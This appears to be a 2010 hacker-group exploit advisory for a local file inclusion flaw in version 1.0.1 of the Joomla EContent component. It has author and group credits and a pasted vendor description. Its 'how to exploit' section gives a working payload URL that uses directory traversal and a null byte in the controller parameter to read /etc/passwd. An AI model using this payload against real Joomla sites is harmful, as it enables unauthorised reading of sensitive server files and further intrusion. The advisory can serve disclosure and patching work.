56 lines
No EOL
1.7 KiB
Text
56 lines
No EOL
1.7 KiB
Text
---------------------------------------------------------------------------------
|
|
Joomla Component EContent Local File Inclusion
|
|
---------------------------------------------------------------------------------
|
|
|
|
Author : Chip D3 Bi0s
|
|
Group : LatinHackTeam
|
|
Email & msn : chipdebios@gmail.com
|
|
Date : 31 March 2010
|
|
Critical Lvl : Moderate
|
|
Impact : Exposure of sensitive information
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
|
|
Application : EContent
|
|
version : 1.0.1
|
|
Developer : E-Content
|
|
website : http://www.econtentsite.com/
|
|
License : GPL type : Non-Commercial
|
|
Date Added : 24 March 2010
|
|
Download : http://www.econtentsite.com/
|
|
|
|
|
|
|
|
Description :
|
|
|
|
If you are looking a way to add new/fresh content to your Joomla website,
|
|
without having to write a new article everyday, then E-Content Joomla
|
|
Component is the solution for you!
|
|
|
|
As we know articles is very important for business, especially for Internet
|
|
Marketing Business. You need to continually write unique and quality articles
|
|
to keep the attention of visitors and search engines.
|
|
|
|
E-Content allows you to automatically collect RSS feed, HTML page content items
|
|
and have each item inserted as an Joomla article in the section and category
|
|
you define. The content of the article will vary based on the specific page you
|
|
select.
|
|
|
|
|
|
--------------
|
|
file error : components/com_econtent/econtent.php
|
|
|
|
how to exploit
|
|
|
|
http://127.0.0.1/index.php?option=com_econtent&controller=../../../../../../../../../../etc/passwd%00
|
|
|
|
------------------------
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++ |